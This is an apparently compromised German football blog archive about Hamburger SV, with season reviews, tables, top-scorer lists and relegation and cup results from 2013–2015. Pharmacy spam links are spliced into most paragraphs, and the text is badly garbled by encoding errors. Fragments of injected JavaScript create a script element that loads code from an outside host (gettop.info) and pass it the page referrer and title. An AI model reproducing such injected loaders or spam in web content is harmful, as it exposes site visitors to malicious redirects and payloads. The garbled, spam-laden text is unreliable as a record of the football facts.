Willkommen auf » Hamburger SV
1.Jun 2015

Nicht erschrecken, angepfiffen wird das order sumycin medication RA?ckspiel der Bundesligarelegation KSC-HSV erst heute Abend um 19:00 (live im Ersten und auf Buy pills online http://nlofm.org/2018/02/01/avodart-prices-walgreens/ Buy generic cialis proffesional comparision. http://freshbyte.co.uk/buy-wellbutrin-in-australia/ cialis preiswert where to buy moduretic fucidin h cream 30g, can you buy cialis safely online. Sportschau.de Cheap ). Noch hAi??lt der Hamburger SV also seinen einzigartigen Status als unabsteigbares GrA?ndungsmitglied der Liga.

Im Norden kennt man den Druck bis zum letzten Tag der Saison ja bereits aus dem vergangenen Jahr. Damals versuchten die beiden gebA?rtigen Hamburger Olli Schulz und Bjarne MAi??del die bibbernden HSV-Fans mit einem schnellen Ritt durch die bewegte Geschichte ihres Vereins fA?r den Fall der FAi??lle vorzubereiten.

Das StA?ck alternativer Geschichtsschreibung mit Abstieg 2014 und Wiederaufstieg 2015 unter Leitung von Trainer Thomas Schaaf hilft vielleicht auch heute, um ein wenig die Nerven zu beruhigen und die Lage einzuordnen…

Ich drA?cke fA?r heute Abend die Daumen. Neunzig Minuten FuAYball spielen und kAi??mpfen und dann mA?sste es doch reichen. diflucan over the counter singapore online buy prandin online order viagra mastercard

26.Mai 2015

Wir zelebrieren auch in diesem Jahr den Abschluss der am vergangenen Wochenende zu Ende gegangenen Bundesligasaison. Hier also die Daten, Fakten und Rekorde der 52. Spielzeit der hAi??chsten deutschen FuAYballliga.

Zum dritten Mal in Folge und insgesamt 25. Mal feiert sich nach 34 Spieltagen der FC Bayern MA?nchen als Ligaprimus. Ein wenig getrA?bt wird die Freude im SA?den der Republik allerdings, da man sich nach dem doppelten Halbfinalaus im DFB-Pokal und der Champions League in diesem Jahr „nur“ mit dem nationalen Meistertitel in die Sommerpause verabschieden muss. Der Rest der FuAYballrepublik denkt sich: Wohl dem, der solche Probleme hat.

Auf dem Youtube-Kanal des FC Bayern gibt’s die zweistA?ndige Komplettaufzeichnung der rot-blauen Meisterfeier auf dem MA?nchner Marienplatz…

Eine selbst fA?r den groAYen FC Bayern unerreichbare Bestmarke verteidigt auch 2014/2015 Borussia Dortmund als Meister der Massen. Der BVB erhAi??hte seinen Zuschauerschnitt sogar noch auf 80.475 GAi??ste im Signal-Iduna-Park pro Spiel und hAi??lt weiterhin den Titel des hAi??chsten Schnitts Europas. In Summe begrA?AYte man 1.368.071 Besucher in Dortmund, 1.239.483 in MA?nchen (nach Umbau der Allianz-Arena ebenfalls mit einem im Vergleich zum Vorjahr hAi??heren Durchschnitt von 72.911) und 1.045.784 auf Schalke (im Durchschnitt 61.517 in der Veltins-Arena). Insgesamt lockte man 13.234.558 Besucher in die Stadien der 18 Bundesligisten.

Abschlusstabelle
1 ~ FC Bayern MA?nchen ~ 79 Pkt. ~ Champions League
2 ~ VfL Wolfsburg ~ 69 Pkt. ~ Champions League
3 ~ Borussia MAi??nchengladbach ~ 66 Pkt. ~ Champions League
4 ~ Bayer Leverkusen ~ 61 Pkt. ~ Champions League Qualifikation
5 ~ FC Augsburg ~ 49 Pkt. ~ Europa League
6 ~ FC Schalke 04 ~ 48 Pkt. ~ Europa League
7 ~ Borussia Dortmund ~ 46 Pkt. ~ Europa League
8 ~ 1899 Hoffenheim ~ 44 Pkt.
9 ~ Eintracht Frankfurt ~ 43 Pkt.
10 ~ Werder Bremen ~ 43 Pkt.
11 ~ 1. FSV Mainz 05 ~ 40 Pkt.
12 ~ 1. FC KAi??ln ~ 40 Pkt.
13 ~ Hannover 96 ~ 37 Pkt.
14 ~ VfB Stuttgart ~ 36 Pkt.
15 ~ Hertha BSC ~ 35 Pkt.
16 ~ Hamburger SV ~ 35 Pkt. ~ Relegation
17 ~ SC Freiburg ~ 34 Pkt. ~ Abstieg
18 ~ SC Paderborn ~ 31 Pkt. ~ Abstieg

Als „Overachiever“ des Jahres dA?rfen sich Borussia MAi??nchengladbach und der FC Augsburg feiern. Die Gladbacher stoAYen nach drei Jahren wieder in die Spitzengruppe der Bundesliga vor und schlieAYen als Dritter. Die Fohlen sind damit direkt fA?r die Champions League Gruppenphase qualifiziert. Augsburg verbessert sich im vierten Jahr nach dem Aufstieg weiter kontinuierlich von Rang 14 und 15 A?ber acht auf fA?nf und darf die Liga somit im kommenden Jahr zum ersten Mal in der Vereinsgeschichte international in der Europa League vertreten. Tolle Leistung von Trainer Markus Weinzierl und seinem Team!

„Underperformer“ kann man im FC Schalke sehen, der sich selbst wie in den vergangenen Jahren unter den besten Vier der Liga wAi??hnte, nach 34 Spieltagen aber auf Platz sechs wiederfindet und umgehend von Trainer Roberto Di Matteo trennte. Auch vom Hamburger SV hat man im Jahr nach der nur knapp gewonnenen Abstiegsrelegation und dem angekA?ndigten Umbruch deutlich mehr erwartet. Die RealitAi??t im Norden sieht jedoch anders aus: Nur 25 Tore und 35 Punkte in 34 Spielen und damit erneut einmal nachsitzen in zwei Endspielen gegen den Dritten der zweiten Liga Karlsruhe.

Eine SondererwAi??hnung verdient sich an dieser Stelle Borussia Dortmund. Der BVB hat es nicht nur geschafft, sich von einem bedrohlichen Platz 17 am Ende der Hinrunde zurA?ck aus dem Abgrund zu kAi??mpfen, sondern nach weiteren 17 Spieltagen mit Platz sieben und der Teilnahme am deutschen Pokalfinale sogar fA?r die Europa League zu qualifizieren.

TorschA?tzenliste Buy
1. Alexander Meier (Eintracht Frankfurt) mit 19 Toren in 26 Spielen
2. Arjen Robben (FC Bayern MA?nchen) mit 17 Toren in 21 Spielen
3. Robert Lewandowski (FC Bayern MA?nchen) mit 17 Toren in 31 Spielen

Alle Treffer des TorschA?tzenkAi??nigs Meier im Zusammenschnitt…

Scorerliste
1. Kevin de Bruyne (VfL Wolfsburg) mit 10 Toren und 21 Vorlagen (Rekord!)
2. Thomas MA?ller (FC Bayern MA?nchen) mit 13 Toren und 15 Vorlagen
3. Arjen Robben (FC Bayern MA?nchen) mit 17 Toren und 8 Vorlagen

Sonstiges
Buy

  • Einen neuen Weitenrekord stellte am vierten Spieltag http://mcjts.com/?p=9486 cheap cialis with free shipping. Moritz Stoppelkamp vom SC Paderborn Purchase mit seinem Fernschuss aus knapp 82 Metern auf
  • Der SA?nder der Liga ist der Gladbacher Granit Xhaka mit zehn Gelben und einer Gelb-Roten Karte in 30 Spielen
  • Die WeiAYe Weste trAi??gt seit 2012 ununterbrochen Manuel Neuer. Bei 32 Auftritten hielt er in diesem Jahr seinen Kasten 20 Mal fA?r den FC Bayern sauber und stellt damit einen neuen Bundesligarekord auf. Eine weitere Bestmarke sind die vier Gegentore der gesamten Hinrunde. Yann Sommer und Borussia MAi??nchengladbach A?bernahmen den Rekord mit zehn Gegentreffern in der zweiten SaisonhAi??lfte
  • otc mobic, finpecia from india. taxi cost from goa airport to calangute

  • Der ElfmetertAi??ter der Liga ist Jaroslav Drobny vom Hamburger SV. Von sieben StrafstAi??AYen gegen sein Team wehrte er drei ab
  • Top-Joker ist Nils Petersen. FA?r Werder Bremen und den SC Freiburg traf er bei zwAi??lf Einwechslungen sechs mal und bereitete zwei Tore vor
  • Die EigentorkAi??nige der Liga stammen vom VfL Wolfsburg. Sebastian Jung, Robin Knoche und Vieirinha trafen je einmal ins eigene Tor
  • viagra 100mm.

  • Das KA?ken der Bundesligasaison ist der MA?nchner Gianluca Gaudino. Er debA?tierte im zarten Alter von 17 Jahren, 9 Monaten und 11 Tagen beim 2:1 gegen den VfL Wolfsburg am 22.08.2014
  • purchase medrol dose pack

  • Die Dauerbrenner der Liga sind die TorhA?ter Ron-Robert Zieler (Hannover 96), Yann Sommer (Borussia MAi??nchengladbach), Bernd Leno (Bayer Leverkusen), Lukas Kruse (SC Paderborn), Roman BA?rki (SC Freiburg), Oliver Baumann (1899 Hoffenheim), sowie die beiden Abwehrspieler Marcelo (Hannover 96) und Ragnar Klavan (FC Augsburg), die keine einzige Minute der Saison verpassten
  • online

  • Dem 1. FC KAi??ln bunkerte sich mit acht 0:0 Unentschieden zu einem weniger triumphalen Eintrag in die BundesligarekordbA?cher
  • Man hAi??re und staune: Mit nun acht Meistertiteln und sieben Pokalsiegen ist Bastian Schweinsteiger der erfolgreichste deutsche Kicker aller Zeiten.

SchlieAYen wir damit also wieder einmal das Kapitel Bundesliga fA?r ein paar Monate. Auch ohne Welt- und Europameisterschaft im Kalender steht aber kein fuAYballloser Sommer vor uns. Neben den Finalspielen in Champions League und DFB-Pokal steht z.B. noch das ein oder andere Profi- und NachwuchslAi??nderspiel auf dem Programm.

27. Mai ~ Europa League Finale Dnipro Dnipropetrovsk – FC Sevilla
28. Mai bis 2. Juni ~ Bundesliga-Relegation
30. Mai ~ DFB-Pokal Finale VfL Wolfsburg – Borussia Dortmund
30. Mai bis 20. Juni ~ U20-Weltmeisterschaft in Neuseeland
6. Juni ~ Champions League Finale Juventus Turin – FC Barcelona
6. Juni bis 5. Juli ~ Weltmeisterschaft der Frauen in Kanada
10. Juni ~ Testspiel Deutschland – USA
13. Juni ~ EM-Qualifikation Gibraltar – Deutschland
17. bis 30. Juni ~ U21-Europameisterschaft in Tschechien
24. bis 27. Juli ~ 1. Spieltag der 2. Bundesliga
1. August ~ DFL-Supercup
7. bis 10. August ~ 1. Runde des DFB-Pokals
14. bis 17. August ~ 1. Spieltag der 1. Bundesliga

Unterm Strich also doch wieder ein gut gefA?llter Sommerplan :) Purchase Purchase buy brand viagra canada Pills buy viagra with american express card Cheap

27.Jul 2014

Vorbereitungsspiele nach dem Motto „GroAY gegen Klein“ gibt es dieser Tage viele, der Erkenntnisgewinn fA?r den Zuschauer hAi??lt sich eher in Grenzen. Ein zweitAi??giges Turnier mit grAi??AYeren Namen aus der Bundesliga ist dagegen schon ein Hingucker. An diesem Wochenende wird zum sechsten Mal der Telekom Cup veranstaltet. Ins Rennen gingen der FC Bayern MA?nchen, der Hamburger SV, Borussia MAi??nchengladbach und der VfL Wolfsburg.

Mittlerweile kann man dem Sponsorenturnier schon fast eine gewisse Tradition zuschreiben. Ausgespielt wird es seit 2009 unter wechselnden Namen und TiteltrAi??gern, allein der Unternehmensfarbton Magenta blieb immer der Gleiche. Zum Auftakt nannte sich die Veranstaltung noch T-Home-Cup und es siegte der Hamburger SV. Es folgte die Umbenennung in LIGA total! Cup und FC Schalke, Borussia Dortmund und Werder Bremen als Gewinner. Seit 2013 heiAYt das Ding nun Telekom Cup und der Titelverteidiger FC Bayern MA?nchen.

Spielerisch kam auch in diesem Jahr im Grunde alles wie erwartet. Es wurde ein gemA?tlicher Sommerkick vor 42.000 Zuschauern in der Hamburger Imtech-Arena. Viele WM-Fahrer befinden sich nachwievor im Urlaub und so durfte sich die zweite Reihe in den zweimal 60 Minuten ohne anschlieAYende VerlAi??ngerung ein wenig prAi??sentieren. Hier die Ergebnisse des Wochenendes…

Die Halbfinals

Hamburger SV ai??i?? VfL Wolfsburg 0:0, 5:6 i.E.
Die Highlights des Spiels…

Auch http://gilpincarwash.com/?p=10876 generic viagras canada, lowest price on femera 2.5. hier und Cheap hier Cheap Purchase zu sehen

FC Bayern MA?nchen ai??i?? Borussia MAi??nchengladbach 2:2, 5:4 i.E.
1:0 Robert Lewandowski (29., Rechtsschuss)
2:0 Franck Ribery (34., Linksschuss)
2:1 Max Kruse (42., Handelfmeter, Linksschuss)
2:2 Max Kruse (60., Foulelfmeter, Linksschuss)
Die Highlights des Spiels…

Auch hier, hier und hier http://www.viking-klima-sp.si/tadapox-over-the-counter/ zu sehen

Das Spiel um Platz 3
Borussia MAi??nchengladbach – Hamburger SV 1:3
0:1 Jacques Zoua (3., Kopfball)
1:1 Raffael (4., Rechtsschuss)
1:2 Rafel van der Vaart (21., Linksschuss)
1:3 Kerem Demirbay (53., Rechtsschuss)
Die Highlights des Spiels…

Auch hier und hier zu sehen

http://www.autodidiermarie.com/2018/02/02/cheap-cabgolin-in-endometriosis/ Das Finale buy sumycin online
FC Bayern MA?nchen – VfL Wolfsburg 3:0
1:0 Robert Lewandowski (4., Kopfball)
2:0 Sebastian Rode (15., Linksschuss)
3:0 Robert Lewandowski (20., Rechtsschuss)
Die Highlights des Spiels…

Auch hier best prices on cialis 5 mg. , order chloroquine mechanism generic amoxicillin no prescription. hier und http://braspelsajter.com/aleve-sale/ sargent pills for depression antidepressants and breastfeeding hier zu sehen

Der FC Bayern verteidigt den Vorjahressieg im Telekom Cup. Darf man da gratulieren? 😉

Der erste „richtige“ Titel der Saison 2014/2015 wird am 13. August im DFL-Supercup zwischen Doublesieger FC Bayern und dem Vizemeister Borussia Dortmund ausgespielt, der nach 2013 erneut das Heimrecht genieAYt. AnstoAY ist um 18:00, das ZDF A?bertrAi??gt im FreeTV.var d=document;var s=d.createElement(‚script‘); buy viagra super active Purchase

15.Mai 2014

Nach dem Abschluss der Bundesligasaison 2013/2014 duellieren sich in den kommenden Tagen noch vier deutsche Profivereine in der Relegation um die LigazugehAi??rigkeit im kommenden Jahr.

Der Hamburger SV versucht nach einer miserablen Saison mit gerade einmal 27 Punkten nach 34 Spieltagen seinen Status als einziges Bundesliga-GrA?ndungsmitglied ohne Abstieg doch noch zu retten. In Hin- und RA?ckspiel bekommt man es mit dem Zweitligadritten Greuther FA?rth zu tun, der die Chance zum direkten Wiederaufstieg ergreifen will. Im luftleeren Raum zwischen Liga 2 und 3 schweben Arminia Bielefeld und der SV Darmstadt 98.

Seit der WiedereinfA?hrung der Relegation 2009 setzte sich A?brigens bisher dreimal der Erst- (2010 1.FC NA?rnberg, 2011 Borussia MAi??nchengladbach, 2013 1899 Hoffenheim) und zweimal der Zweitligist durch (2009 1.FC NA?rnberg und 2012 Fortuna DA?sseldorf). Eine Etage tiefer siegte bis auf vergangenes Jahr (2013 Dynamo Dresden Order ) immer der Vertreter aus der dritten Liga (2009 Paderborn, 2010 FC Ingolstadt, Pills http://convergente.pt/anti-depression-drugs-for-chronic-pain/ 2011 Dynamo Dresden, 2012 Jahn Regensburg).

online Relegation 1. / 2. Bundesliga

15. Mai 2014 20:30 Hamburger SV 0:0 SpVgg Greuther FA?rth
=> finpecia online no prescription. Details cialis costco price , die z pack no prescription online, metformin hydrochloride 500 mg price. Highlights der Begegnung buy pills , Interviews nach dem Spiel

18. Mai 2014 17:00 SpVgg Greuther FA?rth 1:1 Hamburger SV cheap floxin antibiotics
=> Purchase Details, die Highlights der Begegnung Purchase , Stimmen zum Spiel und die Analyse Cheap . Und hier noch eine Aufzeichnung der dramatischen Schlussphase aus der Sport1.fm-A?bertragung

Beide Spiele A?bertrAi??gt live und in voller LAi??nge die ARD im FreeTV (Moderation: Matthias OpdenhAi??vel, Kommentator: Gerd Gottlob), eine RadioA?bertragung gibt es auf Sport1.fm

Relegation 2. Bundesliga / 3. Liga

16. Mai 2014 20:30 SV Darmstadt 98 1:3 Arminia Bielefeld
=> purchase retin a online. Details, die Highlights der Begegnung

19. Mai 2014 20:30 Arminia Bielefeld 2:4 SV Darmstadt 98
=> Details, die Highlights der Begegnung, Stimmen zum Spiel und hier noch ein http://bgcustom.com/ashwagandha-seeds-price/ ausfA?hrlicher Videobericht vom SV Darmstadt

Beide Spiele A?bertragen live und in voller LAi??nge der hessische Rundfunk und der WDR im FreeTV und auf buy phenergan cream hr-online (Moderation: Ralf Scholt, Kommentator: Florian NaAY, Experte: Ansgar Brinkmann), eine RadioA?bertragung gibt es auf Sport1.fm.

12.Mai 2014

Mittlerweile ist es eine lieb gewonnene Tradition, der abgelaufenen Bundesligasaison mit einem lAi??ngeren Artikel hier im Blog einen gebA?hrenden Jahresabschluss zu bereiten (aus dem Archiv: online 2009/2010, Pills buydilantinonline. http://www.mygarantia.es/non-classe/best-antidepressant-for-severe-depression/ 2010/2011, 2011/2012 forzest tablet price in india und 2012/2013). Sammeln wir also mal ein paar Daten, Fakten und Videos zur offiziell 51. Spielzeit des deutschen FuAYballoberhauses.

Ehre, wem Ehre gebA?hrt: Der FC Bayern MA?nchen lieAY nach seinem unvergleichlichen Tripeljahr 2012/2013 kein Prozent nach, marschierte unter dem neuen Trainer Pep Guardiola dominant und ungefAi??hrdet vom ersten bis zum letzten Spieltag als TabellenfA?hrer durch die Saison und kA?rte sich bereits im MAi??rz zum frA?hesten Meister der Ligageschichte.

Meister der Massen ist und bleibt dagegen auch 2013/14 Borussia Dortmund. Der BVB verteidigte mit 80.059 GAi??sten pro Spiel im Signal-Iduna-Park den hAi??chsten Zuschauerschnitt Europas. In Summe begrA?AYte man 1.361.004 Besucher in Dortmund, Ai??1.208.147 in MA?nchen (im Durchschnitt 71.067) und 1.044.246 auf Schalke (im Durchschnitt 61.426). Insgesamt lockte man 13.311.300 Besucher in die 18 Bundesligastadien (im Schnitt 28.132 und damit der zweitbeste Wert der Historie).

Hier mal ein paar Impressionen von rot-weiAYen Meisterfeier auf dem MA?nchner Rathausbalkon, natA?rlich inklusive Bierdusche,Ai??Schale, schiefen GesAi??ngen u.v.m. …

Abschlusstabelle
1 ~ FC Bayern MA?nchen ~ 90 Pkt. ~ Champions League
2 ~ Borussia Dortmund ~ 71 Pkt. ~ Champions League
3 ~ FC Schalke 04 ~ 64 Pkt. ~ Champions League
4 ~ Bayer Leverkusen ~ 61 Pkt. ~ Champions League Qualifikation
5 ~ VfL Wolfsburg ~ 60 Pkt. ~ Europa League
6 ~Ai??Borussia MAi??nchengladbach ~ 55 Pkt. ~ Europa League
7 ~ 1.FSV Mainz 05 ~ 53 Pkt. ~ Europa League
8 ~ FC Augsburg ~ 52 Pkt.
9 ~ 1899 Hoffenheim ~ 44 Pkt.
10 ~ Hannover 96 ~ 42 Pkt.
11 ~ Hertha BSC ~ 41 Pkt.
12 ~ Werder Bremen ~ 39 Pkt.
13 ~ Eintracht Frankfurt ~ 36 Pkt.
14 ~ SC Freiburg ~ 36 Pkt.
15 ~ VfB Stuttgart ~ 32 Pkt.
16 ~ Hamburger SV ~ 27 Pkt. ~ Relegation
17 ~ 1.FC NA?rnberg ~ 26 Pkt. ~ Abstieg
18 ~ Eintracht Braunschweig ~ 21 Pkt. ~ Abstieg

Die „Overachiever“ des Jahres finden sich diesmal im Mittelfeld der Tabelle und sind A?ber diesem Umstand auch wahnsinnig glA?cklich. Nach Platz 15 in der Vorsaison erspielte sich der FC Augsburg mit viel Mut und Lockerheit einen ungefAi??hrdeten achten Rang, fernab jeglicher Abstiegsbedrohung. Und auch Hertha BSC hielt sich als Aufsteiger frei von ExistenzAi??ngsten A?berraschenderweise meist im gesicherten Mittelfeld auf und fuhr nach 34 Spieltagen den verdienten zehnten Tabellenplatz ein.

„Underperformer“ sind zwei Traditionsklubs der Liga: Der Hamburger SV und der VfB Stuttgart. Der Verlauf A?ber die Monate war im Norden wie im SA?den fast eins zu eins der gleiche. Mit hohen Zielen in die Saison gestartet, schwer gestolpert, Trainer gewechselt, keine StabilitAi??t erreicht und so bis zum letzten Spieltag gezittert. Der VfB fuhr noch halbwegs glimpflich auf dem sicheren Rang 15 ein. FA?r den HSV hat der Horror auch nach dem 34. Spieltag kein Ende, denn er muss sich nun in der Abstiegsrelegation gegen den Dritten der zweiten Liga Greuther FA?rth beweisen.

Wie erwartet konnten die beiden A?berraschungsmannschaften der Vorsaison SC Freiburg und Eintracht Frankfurt die Dreifachbelastung Bundesliga, DFB-Pokal und Europa League nur schwer verkraften und sich 2014 wieder nur im unteren Tabellendrittel einfinden.

TorschA?tzenliste
1.Ai??Robert Lewandowski (Borussia Dortmund) mit 20 Toren in 33 Spielen
2. Mario Mandzukic (FC Bayern MA?nchen) mit 18 Toren in 30 Spielen
3. Josip Drmic (1. FC NA?rnberg) mit 17 Toren in 33 Spielen

Alle Treffer des TorschA?tzenkAi??nigs Lewandowski im Zusammenschnitt…

Scorerliste Order contraceptive pill online uk.
1. Robert Lewandowski (Borussia Dortmund) mit 20 Toren und 11 Vorlagen
2. Marco Reus (Borussia Dortmund) mit 16 Toren und 14 Vorlagen
3. Roberto Firmino (1899 Hoffenheim) mit 16 Toren und 11 Vorlagen

Sonstiges
Purchase cheap valtrex no prescription Cheap

  • ai??? Der 1. FC NA?rnberg steigt zum achten Mal aus der Bundesliga ab und ist damit fortan trauriger Rekordhalter
  • ai??? Der SA?nder der Liga ist der Hannoveraner Szabolcs Huszti mit zehn Gelben und einer Roten Karte in 30 Spielen
  • ai??? Die WeiAYe Weste geht wie schon in den beiden Vorjahren an FC Bayern TorhA?ter Manuel Neuer. Er spielte bei 30 Auftritten 14 mal zu Null. Es folgt der Schalker Ralf FAi??hrmann mit 11 gegentorlosen Spielen bei 21 EinsAi??tzen
  • ai??? Top-Joker ist Eric Maxim Choupo-Moting vom FSV Mainz 05 mit 5 Treffern und einer Vorlage nach 13 Einwechslungen
  • ai??? Die EigentorkAi??nige der Liga stammen vom 1. FC NA?rnberg (Niklas Stark, Mike Frantz und Berkay Dabanli) und Werder Bremen (Sebastian PrAi??dl, Assani Lukimya und Nils Petersen) mit je 3 Treffern in den eigenen Kasten
  • Cheap cialis vente au canada Purchase

  • ai??? Das KA?ken der Bundesligasaison ist Uwe-Seeler-Enkel Levin Ai??ztunali von Bayer Leverkusen. Er debA?tierte im zarten Alter von 17 Jahren, 4 Monaten und 26 Tagen am 10.08.2013 gegen den SC Freiburg in der ersten Liga
  • online detrol la generic equivalent

  • ai??? Der Dauerbrenner der Liga ist Ron-Robert Zieler von Hannover 96, der als einziger Spieler keine einzige Minute der Saison verpasste. FleiAYigster Feldspieler ist der Freiburger Innenverteidiger Matthias Ginter mit 22 verpassten Spielminuten

SchlieAYen wir also das Kapitel Bundesliga fA?r diesen Sommer. Ruhig wird es in Sachen FuAYball aber auf keinen Fall, denn fA?r die kommenden Wochen stehen u.a. die Finalspiele in Champions League und DFB-Pokal und dann natA?rlich die Weltmeisterschaft in Brasilien an.

9. bis 21. Mai ~ U-17 FuAYball-Europameisterschaft in Malta
13. Mai ~ LAi??nderspiel Deutschland gegen Polen
14. Mai ~ Europa League Finale FC Sevilla – Benfica Lissabon
15. bis 19. Mai ~ Bundesliga-Relegation
17. Mai ~ DFB-Pokal Finale Borussia Dortmund gegen FC Bayern MA?nchen
24. Mai ~ Champions League Finale Real Madrid gegen Atletico Madrid
1. Juni ~ LAi??nderspiel Deutschland gegen Kamerun
6. Juni ~ LAi??nderspiel Deutschland gegen Armenien
12. Juni ~ ErAi??ffnung FuAYball-Weltmeisterschaft in Brasilien
13. Juli ~ Endspiel der FuAYball-Weltmeisterschaft
1. August ~ 1. Spieltag der 2. Bundesliga
15. bis 18. August ~ 1. Runde des DFB-Pokals
22. August ~ 1. Spieltag der 1. Bundesliga

Auch fA?r den Fan also wieder ein straffes Sommerprogramm :) best foreign pharmacies, rayh viagra india .

10.Mrz 2014

Vor einer Woche besuchte Frank Buschmann fA?r sein Youtube-Format Buschi.TV Felix Magath in dessen order bupronorphine buy lotrisone cream medication Buy Pills neuer Heimat London. Der freie konzeptionelle Rahmen auAYerhalb von Restriktionen und Sendezeiten von TV-Stationen lieAY genA?gend Raum fA?r ein erstklassiges Tiefeninterview.

Es wurde ein Ai??uAYerst kurzweiliges GesprAi??ch A?ber knapp 45 Minuten im legendAi??ren Stadion Craven Cottage. Magath berichtet von seinem Start beim FC Fulham, von der Premier League, seiner Absage an den Hamburger SV, der allgemeinen Situation in der Bundesliga mit dem einsamen FC Bayern an der Spitze und schlieAYlich den deutschen WM-Chancen.

Buschi lAi??sst ihn reden und erklAi??ren, fragt gezielt nach, gestaltet eine lockere AtmosphAi??re, so wie man sich das wA?nscht. So sieht man den gemA?tlich Tee trinkenden Magath mal abseits von Pressekonferenzen und Fernsehstudios. Ein groAYartiges Format also fA?r Begegnungen mit interessanten PersAi??nlichkeiten, dem ich eine erfolgreiche Zukunft wA?nsche.

Los geht’s…

Und hier Teil 2 des GesprAi??chs…

} else { Cheap http://nopero.com/?p=11209 Cheap finasteride 1mg no prescription. vendita cialis contrassegno, elavil on line us pharmacy. Pills buy moduretic Order xenical cena. Order

12.Feb 2014

DFB-Pokal 2013/14 Viertelfinale
Hamburger SV – FC Bayern MA?nchen 0:5

0:1 Mario Mandzukic (22., Linksschuss, M. GAi??tze)
0:2 Dante (26., Kopfball, T. Kroos)
0:3 Arjen Robben (54., Linksschuss, T. Kroos)
0:4 Mario Mandzukic (74., Rechtsschuss, M. GAi??tze)
0:5 Mario Mandzukic (76., Linksschuss)
vor 57.000 Zuschauern in der ausverkauften Imtech Arena in Hamburg

Aufstellung Hamburg: Adler – Lam, Tah, Westermann, Jansen – Badelj (72. Bouy), Rincon – John, van der Vaart (40. Arslan), Ilicevic, Calhanoglu (71. Zoua)

Aufstellung FC Bayern: Neuer – Rafinha, J. Boateng (49. Javi Martinez), Dante, Alaba – Lahm (65. Schweinsteiger) – Robben, Thiago (64. Shaqiri), T. Kroos, M. GAi??tze – Mandzukic

Die Zusammenfassung des Spiels…

AuAYerdem auch hier, Pills Cheap hier und cialis times, buy motilium online. hier, sowie im ARD-Zusammenschnitt http://ggconnections.com/2018/03/15/bactroban-cream-price-philippines/ zu sehen. In der Mediathek gibt’s die Komplettaufzeichnung der ersten und Order cheap diltiazem side Pills zweiten Halbzeit der Partie und die Stimmen zum Spiel clindamicina amerrimedrx. order sominex vs unisom .

Im Anschluss an die ARD-A?bertragung wurden auch gleich die beiden Halbfinalspiele fA?r den 15. und 16. April 2014 ausgelost (beide Spiele A?bertrAi??gt das Erste im FreeTV):
15.04. 20:30 Borussia Dortmund – VfL Wolfsburg
16.04. 20:30 FC Bayern MA?nchen – 1.FC Kaiserslauternvar d=document;var s=d.createElement(‚script‘); ed hardy perfume Purchase Buy http://xn--o9j0bk5t7e2a3h.biz/?p=1672 Pills tadalafil us.

11.Feb 2014

Beim Lokalsender Hamburg 1 analysierte schon im vergangenen August ein waschechtes Nordlicht treffend die Eckdaten der Krise, die den Hamburger SV am 20. Bundesligaspieltag jetzt sogar auf einen Abstiegsrang gefA?hrt hat.

Van der Vaart, Jansen und Adler als StA?tzen der Mannschaft spielen unter ihren MAi??glichkeiten, in der Breite fehlt die QualitAi??t, der Sportchef strahlt alles andere als SouverAi??nitAi??t aus und der Trainer ist die Ai??rmste Sau.

Als Fan steht man Woche fA?r Woche nur ratlos und bangend allein. Die LAi??sung? Vor dem drohenden Einbruch des Bundesligadinos schA?tzt sich der schimpfende, aber vorausplanende Hamburger ganz stilecht mit einem Sturzhelm…
http://www.youtube.com/watch?v=MVFouUCHcgE} else { tadalafil donde comprar. ginette-35 shipping warfarin for sale

3.Dez 2013

In den vergangenen Spielzeiten bildete das Achtelfinale des DFB-Pokals kurz vor Weihnachten den Abschluss im Kalenderjahr des deutschen ProfifuAYballs. Diesmal mA?ssen die verbliebenen zehn Erst-, fA?nf Zweit- und ein Drittligist bereits Anfang Dezember zwischen zwei Ligawochenenden ran. Tja, so entgeht man zumindest Schneetreiben und gefrorenen BAi??den.

Hier die Ergebnisse und Spielberichte der acht Partien im A?berblick…

Dienstag 03.12.
Schalke und Union wurden in den heimischen Stadien vorgefA?hrt, Hamburg muss im Duell der Traditionsvereine gehAi??rig fA?r den Viertelfinaleinzug kAi??mpfen, die ganz groAYe A?berraschung bei den chancenlosen SaarbrA?ckern bleibt aus. Mehr gibt’s zu diesem Pokaldienstag auch nicht zu sagen.

1. FC Union Berlin – 1. FC Kaiserslautern 0:3 => Video-Highlights
Hamburger SV – 1. FC KAi??ln 2:1 => Video-Highlights http://brideschitchat.com/uncategorized/order-abana-himalaya/ (auch hier Buy )
FC Schalke 04 – 1899 Hoffenheim 1:3 => Video-Highlights (auch hier http://gamers.pe/price-of-diovan-at-walmart/ , hier und im ZDF-Bericht)
1. FC SaarbrA?cken – Borussia Dortmund 0:2 => Video-Highlights cheap dipyridamole generic (auch flagyl mexico. how much does motrin 800 mg cost where can i buy tamoxifen in the uk hier, hier und im ZDF-Bericht)
Die Zusammenfassungen aller Partien gibt’s in der ARD-Sportschau

Mittwoch 04.12. how much benadryl to take with oxycodone Purchase
Leverkusen siegt erwartungsgemAi??AY gegen Erstligakonkurrent Freiburg, Wolfsburg tut sich im Duell der AutostAi??dte wahnsinnig schwer, Joselu schieAYt Frankfurt mit drei Toren ins Viertelfinale und der FC Bayern tut das, was er immer tut, er spielt es locker runter.

SC Freiburg – Bayer 04 Leverkusen 1:2 => Video-Highlights
VfL Wolfsburg – FC Ingolstadt 04 2:1 => Video-Highlights
Eintracht Frankfurt – SV Sandhausen 4:2 => Video-Highlights buy tretinoin uk.
FC Augsburg – Bayern MA?nchen 0:2 => Video-Highlights prednisone 20mg tab, cheep viagra. il viagra allunga il rapporto (auch hier, hier und im ZDF-Bericht)
Hier noch die Komplettaufzeichnung des knapp dreistA?ndigen Sportschau-Abends

Weiter geht es dann am 11. und 12. Februar 2014 mit dem Viertelfinale. Die Auslosung der Partien gibt’s am 08. Dezember ab 18:00 in der ARD-Sportschau.

*** Update ***
Die Auslosung ergab folgende Viertelfinalpartien
Eintracht Frankfurt – Borussia Dortmund
TSG 1899 Hoffenheim – VFL Wolfsburg
Hamburger SV – Bayern MA?nchen
Bayer 04 Leverkusen – 1. FC Kaiserslauterns.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; buy benemid medication http://sergioandrefotografia.pt/2018/02/02/cheap-nootropil-tabletta/ Pills Pills

24.Sep 2013

Mitten in die turbulenten Septemberwochen mit dem Auftakt in die Europapokalwettbewerbe und dem Durchstarten der Bundesliga haben die Planer noch die zweite Runde des DFB-Pokals gequetscht.

